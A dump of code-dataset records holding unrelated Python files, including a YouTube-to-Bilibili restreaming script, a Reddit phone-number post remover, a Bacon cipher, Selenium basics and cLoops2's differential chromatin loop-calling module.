b.stopLive(t_room_id) #Just don't care the Live status, JUST STARTLIVE\n\n b.updateRoomTitle(t_room_id, room_title)\n rtmp_link = b.startLive(t_room_id, tmp_area_id)\n if curSub['auto_send_dynamic'] and rtmp_link and questInfo._getObjWithRTMPLink(rtmp_link) is None:\n if curSub['dynamic_template']:\n b.send_dynamic(curSub['dynamic_template']).replace('${roomUrl}', 'https://live.bilibili.com/' + t_room_id)\n else:\n b.send_dynamic('转播开始了哦~')\n return b, t_room_id, rtmp_link\n\n\ndef Async_forwardToBilibili(channelId, link, room_title='Testing Title', area_id=None, isSubscribeQuest=True):\n utitls.runFuncAsyncThread(_forwardToBilibili_Sync, (channelId, link, room_title, area_id, isSubscribeQuest))\ndef _forwardToBilibili_Sync(channelId, link, room_title, area_id=None, isSubscribeQuest=True):\n resloveURLOK = False\n tmp_retryTime = 10\n while tmp_retryTime > 0:\n if 'youtube.com/' in link or 'youtu.be/' in link:\n m3u8Link, err, errcode = _getYotube_m3u8_sync(link)\n if errcode == 0:\n link = m3u8Link\n resloveURLOK = True\n break\n else:\n tmp_retryTime -= 1\n time.sleep(60)\n else:\n utitls.myLogger('_forwardToBilibili_Sync LOG: Unsupport ForwardLink:' + link)\n return\n\n if resloveURLOK:\n b, t_room_id, rtmp_link = bilibiliStartLive(channelId, room_title, area_id)\n if rtmp_link:\n tmp_quest = questInfo._getObjWithRTMPLink(rtmp_link)\n if tmp_quest != None:\n try:\n os.kill(tmp_quest.get('pid', None), signal.SIGKILL)\n except Exception:\n utitls.myLogger(traceback.format_exc())\n questInfo.removeQuest(rtmp_link)\n # force stream\n _forwardStream_sync(link, rtmp_link, 
isSubscribeQuest)\n","sub_path":"AutoOperate.py","file_name":"AutoOperate.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"50281114","text":"N = int(input())\nmemo = []\n\ndef init_memo():\n memo.append(-1)\n memo.append(0)\n memo.append(1)\n memo.append(1)\n\ndef record():\n for i in range(4, N + 1):\n value = 10000000001\n\n if(i % 3 == 0):\n value = min(memo[i - 1], memo[i // 3])\n\n if(i % 2 == 0):\n value = min(value, memo[i // 2])\n\n value = min(memo[i - 1], value)\n\n value += 1\n memo.append(value)\n\ndef extra():\n if(N == 1):\n print(memo[1])\n return False\n\n if(N == 2):\n print(memo[2])\n return False\n\n if(N == 3):\n print(memo[3])\n return False\n\n return True\n\ndef print_result():\n print(memo.pop())\n\ndef main():\n init_memo()\n\n if(extra()):\n record()\n print_result()\n \n return\n \n \n \nif(__name__ == \"__main__\"):\n main()\n ","sub_path":"by date/2021.01.25/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456540295","text":"import praw\nimport pprint\nimport re\n\n#take string and search for presence of numeral(s). returns match object\ndef checkForNumeral(post):\n return re.search('\\d')\n\n#searches and deletes all non-whitespace special characters\ndef formatPost(post):\n formatted = re.sub('[^A-Za-z0-9\\s]+', '', post)\n return formatted\n\n#searches for phone number. returns match object\ndef findNumber(newPost):\n #is this better?: '\\d{3}\\s?\\d{3}\\s?\\d{4}'\n #this seems a little cleaner since we no longer have\n #to worry about special characters\n pattern = re.compile('^\\(?([0-9]{3})\\)?[-.]?([0-9]{3})[-.]?([0-9]{4})$')\n numberFound = pattern.search(newPost)\n return numberFound\n\n#deletes submission or comment\ndef removePost(item):\n item.delete()\n\n\ndef main():\n reddit = praw.Reddit(client_id='',\n client_secret='',\n password='',\n user_agent='testscript.v1.0./u/freenet420',\n username='')\n subreddit = reddit.subreddit('ZenDen').new(limit=100)\n\n\n for submission in subreddit:\n\n newPost = formatPost(submission.selftext)\n\n #I need some help getting these if statments out of main()\n if checkForNumeral():\n numberFound = findNumber(newPost)\n\n if numberFound:\n removePost(submission)\n\n\n #try to keep a stament like if or while or anything\n #outside of this loop\n #think of this like the main that runs little parts\n #of the program.\n\n #you may find that you have to use it with the way you\n #are thinknig of doing and if thats so, go for it.\n\nmain()\n\n\n#Ideas:\n#Use an if that checks posts for numbers in the first place that way\n#we dont go over anything that doesnt have a number in itself.\n\n#Locial Flow:\n#main, formatPost, checkForNumber, findNumber, removeNumber\n\n#Alternate Logical Flow (if there is no number in post don't format)\n#main, checkForNumber, formatPost, findNumber, removeNumber\n","sub_path":"PhoneFinder.py","file_name":"PhoneFinder.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"188777811","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n @Time : 2020/06/21\n @Auth : 晨光\n @File : selenium基础操作.py\n @IDE : PyCharm\n @Email: 624011110@qq.com\n-------------------------------------------------\n\"\"\"\nfrom selenium import webdriver\n\ndriver = 
webdriver.Chrome()\n\nurl = 'http://www.baidu.com'\n\n# 隐式等待 20m\ndriver.implicitly_wait(20)\n\n# 1, 打开网页\ndriver.get(url)\n\n# 2 , 窗口最大化\ndriver.maximize_window()\n\n# 3, 窗口最小化\ndriver.minimize_window()\n\n# 4, 前进\ndriver.forward()\n\n# 5, 后退\ndriver.back()\n\n# 6, 刷新\ndriver.refresh()\n\n# 7, 退出浏览器\ndriver.quit()\n\n# 8, 关闭标签页\ndriver.close()","sub_path":"WebClass/web_05_元素定位/selenium基础操作.py","file_name":"selenium基础操作.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"305941607","text":"def findWinners():\r\n fac = int(input(\"Enter factor digit: \"))\r\n must = int(input(\"Enter must-have digit: \"))\r\n n = int(input(\"Enter the number of participants: \"))\r\n\r\n count = 0\r\n\r\n for i in range(1,n+1):\r\n if ((i % fac == 0) and contains(must, i)):\r\n count += 1\r\n print(i)\r\n print(\"Total number of winners: \", count)\r\n\r\n# this boolean function checks if the number 'num'\r\n# contains the digit 'digit'\r\ndef contains(digit, num):\r\n while num > 0:\r\n if (num % 10 == digit):\r\n return True\r\n else:\r\n num = num // 10\r\n return False\r\n\r\nfindWinners()\r\n","sub_path":"random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"473545861","text":"\r\n\r\ndef readKey(filepath):\r\n key_dict = {}\r\n with open(filepath, 'r') as f:\r\n for line in f:\r\n items = line.split()\r\n # print(items)\r\n key, values = items[0], items[1]\r\n key_dict[key] = values\r\n return key_dict\r\n \r\nkey = readKey('E:\\Sai\\key.txt')\r\n\r\n\r\n# def encode(key, message, text):\r\n # my_dict = key\r\n # cipher, final_text = \"\", \"\"\r\n # message = list(message.upper())\r\n # if (5*len(message)) > len(text):\r\n # print('abc')\r\n # text = text * int((len(text) / len(message) + 1) \r\n # elif (len(text) >= 5*len(message)):\r\n # text = text \r\n # print('def')\r\n # # part 1 of the encoding : converting to the binary code\r\n # for letter in message:\r\n # if(letter != ' '):\r\n # cipher += my_dict[letter]\r\n # else:\r\n # cipher += ' '\r\n # # part 2 of encoding : converting binary code to string of letters \r\n # if text == text:\r\n # i = 0\r\n # new_text = text.replace(' ', '').lower()\r\n # # print(new_text)\r\n # for i in range(0,len(new_text),5):\r\n # substr_text = list(new_text[i:i + 5])\r\n # substr_cip = list(cipher[i:i + 5])\r\n # if 'b' in substr_cip:\r\n # for i in range(0,len(substr_cip)):\r\n # if substr_cip[i] == 'b':\r\n # substr_text[i] = substr_text[i].upper()\r\n \r\n # else:\r\n # pass\r\n # final_text += ''.join(substr_text)\r\n \r\n # elif text == None:\r\n # i = 0\r\n # new_text = ''.join(random.choices(string.ascii_lowercase, k=len(message)*5))\r\n # # print(new_text)\r\n # for i in range(0,len(new_text),5):\r\n # substr_text = list(new_text[i:i + 5])\r\n # substr_cip = list(cipher[i:i + 5])\r\n # if 'b' in substr_cip:\r\n # for i in range(0,len(substr_cip)):\r\n # if substr_cip[i] == 'b':\r\n # substr_text[i] = substr_text[i].upper()\r\n \r\n # else:\r\n # pass\r\n # final_text += ''.join(substr_text)\r\n \r\n # return str(final_text) \r\n \r\n# print(encode(key, 'ALICE', 'ora et labora'))\r\n\r\n\r\ndef decode(key, text): \r\n decipher, final = '' , ''\r\n text = text\r\n my_dict = key\r\n # print(my_dict.keys())\r\n # print(my_dict.values())\r\n substr_cip = ['a'] * len(text)\r\n # print(substr_cip)\r\n # part 1 of decoding \r\n for i in 
range(0, len(text), 5):\r\n        substr_text = list(text[i:i + 5])\r\n        # print(substr_text)\r\n        # start a fresh pattern for every 5-letter chunk\r\n        substr_cip = ['a'] * len(substr_text)\r\n        for j in range(0, len(substr_text)):\r\n            if substr_text[j].isupper():\r\n                substr_cip[j] = 'b'\r\n        # print(substr_cip)\r\n        final += ''.join(substr_cip)\r\n    print('final:', final)\r\n    # part 2 of decoding: map every 5-letter code back to its plain letter\r\n    for k in range(0, len(final), 5):\r\n        substr = final[k:k + 5]\r\n        for letter, code in my_dict.items():\r\n            if substr == code:\r\n                decipher += letter\r\n    print('decipher:', decipher)\r\n    return decipher\r\n\r\nprint(decode(key, 'dracodOrMIeNsnumquAmtiTil'))","sub_path":"read_test.py","file_name":"read_test.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"279535569","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\"\"\"\ncallDiffLoops.py\nCalling differentially enriched loops between different cells/conditions or similar situations.\nWell tested for Trac-looping data.\n2020-03-10: add MA and volcano plot.\n2020-05-04: MANorm2 normalization added.\n2020-05-05: refined a lot with the base of MANorm\n2020-05-06: updated auto-estimation of MA Mcut and Acut\n2020-05-10: fitting values changed to counts; if using interactions per kb, there will be outliers in the MA plot. The cutoffs of M and A are determined in the background; since there is a systematic difference between bg and fg, fitting again is needed.\n2020-05-20: try to add the shift of background to foreground; too stringent\n2020-06-24: try to add the estimation of anchors\n2020-07-30: try to add the estimation of anchors, and separated loops. acut and mcut estimated from the background are already very strong. win size may not matter, so for efficiency it is set to 1. Also add p-values to bg estimation.\n2021-04-12: customizable parameters for acut and mcut for the MA plot added\n2021-05-10: add heatmap vmin/vmax and cmap options; a no-p-value-cutoff option added to include more loops.\n2021-08-20: add 1D peak normalization option.\n\"\"\"\n\n__date__ = \"\"\n__modified__ = \"\"\n__email__ = \"caoyaqiang0410@gmail.com\"\n\n#sys\nimport os\nimport sys\nimport json\nfrom glob import glob\nfrom copy import deepcopy\nfrom datetime import datetime\n\n#3rd\nimport joblib\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom scipy.stats import poisson\nfrom sklearn import linear_model\nfrom joblib import Parallel, delayed\nfrom sklearn.mixture import GaussianMixture as GMM\n\n#cLoops\nfrom cLoops2.io import parseTxt2Loops, ixy2pet, dloops2txt, dloops2juiceTxt, loops2washuTxt, dloops2NewWashuTxt\nfrom cLoops2.ds import Loop, XY, DiffLoop\nfrom cLoops2.agg import getALoops\nfrom cLoops2.geo import checkLoopOverlap\nfrom cLoops2.est import estSfMANorm\nfrom cLoops2.settings import *\nfrom cLoops2.callCisLoops import getLoopNearbyPETs\n\n\ndef mergeLoops(aloops, samplea, bloops, sampleb):\n    \"\"\"\n    Get the union set of loops for candidate test samples. 
\n    \"\"\"\n    mloops = {}\n    allkeys = set(aloops.keys())\n    allkeys.update(bloops.keys())\n    for key in allkeys:\n        mloops[key] = []\n\n    for key in mloops.keys():\n        if key not in aloops:\n            for loop in bloops[key]:\n                loop.id = loop.id + \"|\" + sampleb\n                mloops[key].append(loop)\n        elif key not in bloops:\n            for loop in aloops[key]:\n                loop.id = loop.id + \"|\" + samplea\n                mloops[key].append(loop)\n        else:\n            nloops = []\n            #scan a first\n            for aloop in aloops[key]:\n                flag = True # no overlapped loops, keep it\n                p = -1\n                for j, bloop in enumerate(bloops[key]):\n                    if checkLoopOverlap(aloop, bloop):\n                        flag = False\n                        p = j\n                        break\n                #no overlapped loop found, just add it\n                if flag == True:\n                    aloop.id = aloop.id + \"|\" + samplea\n                    nloops.append(aloop)\n                else: #merge overlapped loops, skip the bloop\n                    bloop = deepcopy(bloops[key][p])\n                    del bloops[key][p]\n                    nloop = Loop()\n                    nloop.id = \"|\".join([aloop.id, samplea, bloop.id, sampleb])\n                    nloop.chromX = aloop.chromX\n                    nloop.chromY = aloop.chromY\n                    nloop.x_start = min(aloop.x_start, bloop.x_start)\n                    nloop.x_end = max(aloop.x_end, bloop.x_end)\n                    nloop.x_center = (nloop.x_start + nloop.x_end) / 2\n                    nloop.y_start = min(aloop.y_start, bloop.y_start)\n                    nloop.y_end = max(aloop.y_end, bloop.y_end)\n                    nloop.y_center = (nloop.y_start + nloop.y_end) / 2\n                    if len(set(key.split(\"-\"))) == 1: #intra-chromosomal loop\n                        nloop.distance = nloop.y_center - nloop.x_center\n                    nloops.append(nloop)\n            #scan b to add to merged\n            for bloop in bloops[key]:\n                bloop.id = bloop.id + \"|\" + sampleb\n                nloops.append(bloop)\n            mloops[key] = nloops\n    return mloops\n\n\ndef quantDloops(key, loops, fixya, fixyb, cut=0, mcut=-1, win=1, pseudo=1.0):\n    \"\"\"\n    Quantify candidate loops and estimate their nearby background PETs.\n    \"\"\"\n    if len(loops) == 0:\n        return None\n\n    #query structure\n    axy = ixy2pet(fixya, cut=cut, mcut=mcut)\n    bxy = ixy2pet(fixyb, cut=cut, mcut=mcut)\n\n    #all information of nearby counts\n    ts = []\n    cs = []\n\n    print(\"Quantify %s loops for %s.\" % (len(loops), key))\n    dloops = []\n    for loop in tqdm(loops):\n        ara, arb, arab = axy.queryLoop(loop.x_start, loop.x_end, loop.y_start,\n                                       loop.y_end)\n        bra, brb, brab = bxy.queryLoop(loop.x_start, loop.x_end, loop.y_start,\n                                       loop.y_end)\n        arabs, anbps = getLoopNearbyPETs(loop, axy, win)\n        brabs, bnbps = getLoopNearbyPETs(loop, bxy, win)\n        #get all the information\n        dloop = DiffLoop()\n        dloop.id = loop.id\n        dloop.chromX = loop.chromX\n        dloop.chromY = loop.chromY\n        dloop.x_start = loop.x_start\n        dloop.x_end = loop.x_end\n        dloop.x_center = loop.x_center\n        dloop.y_start = loop.y_start\n        dloop.y_end = loop.y_end\n        dloop.y_center = loop.y_center\n        dloop.distance = loop.y_center - loop.x_center\n        dloop.raw_trt_ra = len(ara)\n        dloop.raw_trt_rb = len(arb)\n        dloop.raw_con_ra = len(bra)\n        dloop.raw_con_rb = len(brb)\n        dloop.raw_trt_rab = len(arab)\n        dloop.raw_con_rab = len(brab)\n        dloop.size = dloop.x_end - dloop.x_start + dloop.y_end - dloop.y_start\n        dloop.raw_trt_mrab = np.mean(arabs)\n        dloop.raw_con_mrab = np.mean(brabs)\n        ts.extend(arabs)\n        cs.extend(brabs)\n        dloop.trt_es = dloop.raw_trt_rab / max(dloop.raw_trt_mrab, pseudo)\n        dloop.con_es = dloop.raw_con_rab / max(dloop.raw_con_mrab, pseudo)\n        dloops.append(dloop)\n    return key, ts, cs, dloops\n\n\ndef plotBgMANorm(sf, cs, ts, m, a, m2, a2, fout, mcut, acut, fdr):\n    \"\"\"\n    Plot the MANorm2 result before and after for background data, and estimate cutoffs\n    @param sf: [], list of scaling factors\n    @param cs: [], list of control background data,log2 transformed\n    @param ts: [], list of target background 
data,log2 transformed\n @param m: [], np.log2(cs)-np.log2(ts)\n @param a: [], (np.log2(cs)+np.log2(ts))/2\n \"\"\"\n fig, axs = pylab.subplots(1,\n 3,\n figsize=(8.5, 2.2),\n sharex=False,\n sharey=False)\n axs = axs.reshape(-1)\n #plot 1 raw data\n axs[0].scatter(ts, cs, s=1, c=\"gray\")\n axs[0].set_xlabel(\"target log2(PETs)\")\n axs[0].set_ylabel(\"control log2(PETs)\")\n axs[0].set_title(\"raw bg data\")\n #plot the fit\n #show the formula\n if sf[1] > 0:\n formula = \"y=%.3fx+%.3f\" % (sf[0], sf[1])\n else:\n formula = \"y=%.3fx%.3f\" % (sf[0], sf[1])\n axs[0].plot(ts, ts * sf[0] + sf[1], label=formula)\n axs[0].legend()\n #plot 2, raw data MA\n axs[1].scatter(a, m, s=1, c=\"gray\")\n axs[1].set_title(\"before normalization\\nmean(M):%.3f;M~A PCC:%.3f\" %\n (np.mean(m), np.corrcoef(m, a)[0][1]),\n fontsize=8)\n axs[1].set_xlabel(\"A\")\n axs[1].set_ylabel(\"M\")\n #plot 3 transformed data\n axs[2].scatter(a2, m2, s=1, c=\"gray\")\n axs[2].set_title(\"after normalization\\nmean(M):%.3f;M~A PCC :%.3f\" %\n (np.mean(m2), np.corrcoef(m2, a2)[0][1]),\n fontsize=8)\n\n axs[2].set_xlabel(\"A\")\n axs[2].set_ylabel(\"M\")\n upm = np.where(m2 >= mcut)[0]\n upa = np.where(a2 >= acut)[0]\n up = list(set(upm).intersection(upa))\n downm = np.where(m2 <= -mcut)[0]\n downa = np.where(a2 >= acut)[0]\n down = list(set(downm).intersection(downa))\n #up dots\n axs[2].scatter(a2[up],\n m2[up],\n color=colors[2],\n s=1,\n label=\"up %.3f%s\" % (float(len(up)) / len(m2) * 100, \"%\"))\n #down dots\n axs[2].scatter(a2[down],\n m2[down],\n color=colors[3],\n s=1,\n label=\"down %.3f%s\" %\n (float(len(down)) / len(m2) * 100, \"%\"))\n axs[2].legend()\n pylab.suptitle(\"bg FDR<=%.3f mcut=%.3f acut=%.3f\" % (fdr, mcut, acut),\n fontsize=8)\n pylab.subplots_adjust(top=0.7, wspace=0.3, hspace=0.5)\n pylab.savefig(\"%s_background_MANormFit.pdf\" % fout)\n\n\ndef getBgNorm(cs,\n ts,\n fout,\n mcut=0,\n acut=0,\n step=0.1,\n fdrcut=0.05,\n pseudocut=1.0\n ):\n \"\"\" \n Do the MANorm with background data and estimate the cutoffs.\n @param cs: [], list of background counts of control data\n @param ts: [], list of background counts of target data\n @param cfgs: [], list of foreground counts of control data\n @param tfgs: [], list of foreground counts of target data\n @param fout: output prefix for plot\n @param mcut: float,M cutoff for MA plot\n @param acut: float,A cutoff for MA plot\n @param step: float, step for increasing mcut and acut while searching\n @param fdrcut: float, main cutoff\n @param pseudocut: float, used to avoid 0 \n \"\"\"\n #remove zeros for log transformation\n cs = np.array(cs)\n ts = np.array(ts)\n cs = np.log2(cs + pseudocut)\n ts = np.log2(ts + pseudocut)\n\n #linear shiftting\n sf = estSfMANorm(cs, ts)\n m = cs - ts\n a = (ts + cs) / 2\n #transform the data\n ts2 = [sf[0] * t + sf[1] for t in ts]\n\n m2 = cs - ts2\n a2 = (cs + ts2) / 2\n m2abs = np.abs(m2)\n #get the acut\n fdr = 1\n i = 0\n while fdr > fdrcut:\n if i % 2 == 0:\n acut = acut + step\n else:\n mcut = mcut + step\n i += 1\n de = np.where(m2abs >= mcut)[0]\n de = len(np.where(a2[de] >= acut)[0])\n fdr = float(de) / len(m2abs)\n #plot the estimated result\n plotBgMANorm(sf, cs, ts, m, a, m2, a2, fout, mcut, acut, fdr)\n return sf, acut, mcut\n\n\ndef estLoopDiffSig(key, sf, ta, tb, dloops, pseudo=1.0):\n \"\"\"\n Estimation of differential significance.\n @param key: str,chrom-chrom\n @param sf: [float,float],scaling factor,\n @param ta: float or int, total PETs for sample A\n @param tb: float or int, total PETs for sample B\n 
@param dloops: list of cLoops2.ds.DiffLoop object\n @param pseudo: float/int, pseudo counts, used to avoid /0 or log(0)\n \"\"\"\n #cs for control ipk, ts for target ipk, ts2 for scaled\n cs, ts, ts2 = [], [], []\n print(\"Estimate difference significance %s loops for %s.\" %\n (len(dloops), key))\n for loop in tqdm(dloops):\n loop.trt_density = max(loop.raw_trt_rab,\n pseudo) / loop.size / ta * 10**9\n loop.con_density = max(loop.raw_con_rab,\n pseudo) / loop.size / tb * 10**9\n #the MA fitting is based on log2 transformation\n loop.scaled_trt_rab = 2**(sf[0] * np.log2(loop.raw_trt_rab) + sf[1])\n loop.scaled_trt_mrab = 2**(sf[0] * np.log2(loop.raw_trt_mrab) + sf[1])\n loop.scaled_trt_ra = 2**(sf[0] * np.log2(loop.raw_trt_ra) + sf[1])\n loop.scaled_trt_rb = 2**(sf[0] * np.log2(loop.raw_trt_rb) + sf[1])\n #target sample has potential to be significant\n if loop.scaled_trt_rab > loop.raw_con_rab:\n fg = loop.scaled_trt_rab\n bg = max(loop.raw_con_rab, loop.raw_con_mrab)\n #control sample has potential to be significant\n else:\n fg = loop.raw_con_rab\n bg = max(loop.scaled_trt_rab, loop.scaled_trt_mrab)\n cs.append(max(loop.raw_con_rab, pseudo))\n ts.append(max(loop.raw_trt_rab, pseudo))\n ts2.append(max(loop.scaled_trt_rab, pseudo))\n pop = poisson.sf(fg - 1, bg)\n pop = max([pop, 1e-300])\n loop.poisson_p_value = pop\n #loop.raw_fc = np.log2(max(loop.raw_trt_rab, pseudo) / ta) - np.log2( max(loop.raw_con_rab, pseudo) / tb)\n #loop.scaled_fc = np.log2(max(loop.scaled_trt_rab, pseudo)) - np.log2( max(loop.raw_con_rab, pseudo) )\n loop.raw_fc = np.log2(loop.raw_trt_rab / ta) - np.log2(\n loop.raw_con_rab / tb)\n loop.scaled_fc = np.log2(loop.scaled_trt_rab) - np.log2(\n loop.raw_con_rab)\n return dloops, cs, ts, ts2\n\n\ndef markDiffSig(loops, acut, mcut, pcut=1e-2, pseudo=1,igp=False,noPCorr=False):\n \"\"\"\n Carry out Bonferroni correction for p-values first then mark the significance of loops\n \"\"\"\n for loop in loops:\n if noPCorr == False:\n loop.poisson_p_value = min(1, loop.poisson_p_value * len(loops))\n if igp == False:\n if loop.poisson_p_value <= pcut and abs(loop.scaled_fc) >= mcut:\n c = np.log2(max(loop.raw_con_rab, pseudo))\n t = np.log2(max(loop.scaled_trt_rab, pseudo))\n #loop.significant = 1\n a = (c + t) / 2\n if a >= acut:\n loop.significant = 1\n else:\n loop.significant = 0\n else:\n loop.significant = 0\n else:\n if abs(loop.scaled_fc) >= mcut:\n c = np.log2(max(loop.raw_con_rab, pseudo))\n t = np.log2(max(loop.scaled_trt_rab, pseudo))\n #loop.significant = 1\n a = (c + t) / 2\n if a >= acut:\n loop.significant = 1\n else:\n loop.significant = 0\n else:\n loop.significant = 0\n return loops\n\n\ndef plotDiffLoopsMA(sigIndex, cs, ts, ts2, tname, cname, mcut, acut, fout):\n \"\"\"\n Plot the MA plot for differential enriched loops.\n \"\"\"\n cs = np.log2(cs)\n ts = np.log2(ts)\n ts2 = np.log2(ts2)\n m = ts - cs\n a = (ts + cs) / 2\n m2 = ts2 - cs\n a2 = (ts2 + cs) / 2\n #start plot\n fig, axs = pylab.subplots(1, 2, figsize=(6.4, 2.75 * 0.8))\n #raw data\n axs[0].scatter(a, m, s=1, c=\"gray\")\n axs[0].set_title(\"before normalization\\nmean(M):%.3f;M~A PCC:%.3f\" %\n (np.mean(m), np.corrcoef(m, a)[0][1]),\n fontsize=8)\n axs[0].set_xlabel(\"A, 1/2( log2(%s)+log2(%s) )\" % (tname, cname),\n fontsize=6)\n axs[0].set_ylabel(\"M, log2(%s) - log2(%s)\" % (tname, cname), fontsize=6)\n #scaled data\n axs[1].scatter(a2, m2, s=1, c=\"gray\")\n axs[1].set_title(\"after normalization\\nmean(M):%.3f;M~A PCC :%.3f\" %\n (np.mean(m2), np.corrcoef(m2, a2)[0][1]),\n fontsize=8)\n 
#differentially enriched loops\n    up = np.where(m2 >= mcut)[0]\n    up = list(set(up).intersection(set(sigIndex)))\n    up = list(set(np.where(a2 >= acut)[0]).intersection(up))\n    axs[1].scatter(a2[up], m2[up], color=colors[2], s=1, alpha=1)\n    down = np.where(m2 <= -mcut)[0]\n    down = list(set(down).intersection(set(sigIndex)))\n    down = list(set(np.where(a2 >= acut)[0]).intersection(down))\n    #cutoff lines\n    axs[1].scatter(a2[down], m2[down], color=colors[3], s=2, alpha=1)\n    axs[1].axhline(y=0,\n                   linewidth=1,\n                   linestyle=\"--\",\n                   color=colors[0],\n                   alpha=0.5)\n    axs[1].axhline(y=mcut, linewidth=1, linestyle=\"--\", color=colors[1])\n    axs[1].axhline(y=-mcut, linewidth=1, linestyle=\"--\", color=colors[1])\n    axs[1].axvline(x=acut,\n                   linewidth=1,\n                   linestyle=\"--\",\n                   color=colors[4],\n                   alpha=0.5)\n    mm = np.max(m2) * 0.8\n    ma = np.max(a2) * 0.7\n    axs[1].text(ma, mm, \"%s loops\" % len(up), color=colors[2])\n    axs[1].text(ma, -mm, \"%s loops\" % len(down), color=colors[3])\n    axs[1].set_xlabel(\"A, 1/2( log2(%s)+log2(%s) )\" % (tname, cname),\n                      fontsize=6)\n    axs[1].set_ylabel(\"M, log2(%s) - log2(%s)\" % (tname, cname), fontsize=6)\n    fig.tight_layout()\n    pylab.savefig(\"%s_diffLoopsMA.pdf\" % (fout))\n\n\ndef plotDiffLoopsVolcano(f, output, tname, cname, fccut=1, pcut=1e-2):\n    \"\"\"\n    Plot the volcano plot for differentially enriched loops.\n    \"\"\"\n    mat = pd.read_csv(f, index_col=0, sep=\"\\t\")\n    fig, ax = pylab.subplots()\n    fc = mat[\"scaledFc\"]\n    ps = mat[\"poissonPvalue\"]\n    ps = -np.log10(ps)\n    s = mat[\"significant\"]\n    s = s[s > 0].index\n    #all dots\n    ax.scatter(fc, ps, color=\"gray\", s=1, alpha=0.5)\n    up = fc[fc > 0].index.intersection(s)\n    down = fc[fc < 0].index.intersection(s)\n    #up dots\n    ax.scatter(fc[up], ps[up], color=colors[2], s=1)\n    #down dots\n    ax.scatter(fc[down], ps[down], color=colors[3], s=1)\n    ax.axhline(y=-np.log10(pcut), linewidth=1, linestyle=\"--\", color=colors[0])\n\n    ax.text(3, 90, \"%s loops\" % len(up), color=colors[2])\n    ax.text(-3, 90, \"%s loops\" % len(down), color=colors[3])\n\n    ax.set_xlabel(\"log2( %s/%s )\" % (tname, cname))\n    ax.set_ylabel(\"-log10(p-value)\")\n    ax.set_ylim([-1, 100])\n    pylab.savefig(\"%s_diffLoopsVolcano.pdf\" % (output))\n\n\ndef getDiffAggLoops(predir, loops, cpu=1, norm=True):\n    \"\"\"\n    Get the mean matrix and enrichment score.\n    \"\"\"\n    metaf = predir + \"/petMeta.json\"\n    meta = json.loads(open(metaf).read())\n    keys = list(meta[\"data\"][\"cis\"].keys())\n    keys = list(set(keys).intersection(set(loops.keys())))\n    ds = Parallel(n_jobs=cpu, backend=\"multiprocessing\")(delayed(getALoops)(\n        key,\n        meta[\"data\"][\"cis\"][key][\"ixy\"],\n        loops[key],\n    ) for key in keys)\n    mat = np.concatenate([d[0] for d in ds if d[0] is not None], axis=0)\n    es = []\n    for i in range(mat.shape[0]):\n        p = int(mat[i].shape[0] / 2)\n        if mat[i].mean() > 0:\n            nmat = deepcopy(mat[i])\n            nmat[p, p] = 0\n            if nmat.mean() == 0.0:\n                continue\n            else:\n                es.append(mat[i, p, p] / nmat.mean())\n        else:\n            es.append(0.0)\n        if norm:\n            if mat[i].sum() == 0.0:\n                continue\n            else:\n                mat[i] = mat[i] / mat[i].sum()\n                mat[i] = (mat[i] - mat[i].mean()) / mat[i].std()\n    mat = np.mean(mat, axis=0)\n    return mat, es\n\n\ndef plotDiffAggLoops(dloops, output, tl, cl, td, cd, cpu=1, norm=True,vmin=None,vmax=None,cmap=\"summer\"):\n    \"\"\"\n    Plot the aggregated unique and overlapped loops.\n    \"\"\"\n    #process meta information\n    na = td.split(\"/\")[-1] #name of sample directory\n    nb = cd.split(\"/\")[-1]\n\n    #separated loops as overlapped, trt specific, con specific\n    overlappedLoops = {}\n    trtLoops 
= {}\n conLoops = {}\n #counts of called un-specific and specific loops\n cover, ctrt, ccon = 0, 0, 0\n for loop in dloops:\n key = loop.chromX + \"-\" + loop.chromY\n if loop.significant < 1:\n if key not in overlappedLoops:\n overlappedLoops[key] = []\n overlappedLoops[key].append(loop)\n cover += 1\n else:\n if loop.scaled_fc > 0:\n if key not in trtLoops:\n trtLoops[key] = []\n trtLoops[key].append(loop)\n ctrt += 1\n else:\n if key not in conLoops:\n conLoops[key] = []\n ccon += 1\n conLoops[key].append(loop)\n \n #cmap for heatmaps\n if cmap is None:\n cmap = cmaps[\"summer\"]\n else:\n cmap = cmaps[cmap]\n\n #show enrichment score and aggregation plot\n fig, axs = pylab.subplots(2, 3, figsize=(10, 6))\n \n ax = axs[0][0]\n if cover > 0:\n trtOverMat, trtOverES = getDiffAggLoops(td, overlappedLoops, cpu)\n sns.heatmap(trtOverMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_ylabel(na, fontsize=10)\n ax.set_title(\"%s un-specific loops\\nES:%.3f\" %\n (cover, np.mean(trtOverES)),\n fontsize=8)\n else:\n ax.set_title(\"No common loops\")\n\n ax = axs[0][1]\n if ctrt > 0:\n trtTrtMat, trtTrtES = getDiffAggLoops(td, trtLoops, cpu)\n sns.heatmap(trtTrtMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"%s specific loops\\nES:%.3f\" %\n (ctrt, np.mean(trtTrtES)),\n fontsize=8)\n else:\n ax.set_title(\"No %s unique loops\" % na)\n\n ax = axs[0][2]\n if ccon > 0:\n trtConMat, trtConES = getDiffAggLoops(td, conLoops, cpu)\n 